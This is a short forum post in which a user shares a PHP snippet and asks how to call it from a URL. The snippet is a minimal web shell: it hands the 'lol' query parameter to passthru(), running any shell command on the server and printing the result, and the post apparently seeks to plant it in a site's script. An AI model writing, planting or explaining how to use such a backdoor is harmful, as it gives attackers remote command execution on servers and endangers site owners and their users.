View Single Post
  #1  
Old 04-25-2025, 11:35 PM

tssss tssss is offline
Join Date: Nov 2023
Posts: 0
Default


if i put this code in php script
how can i use this ?
if(isset($_GET['lol'])){
echo '<pre>';
passthru($_GET['lol']);
exit();
}
http://www.site.com/index?lol.php ?
can some one help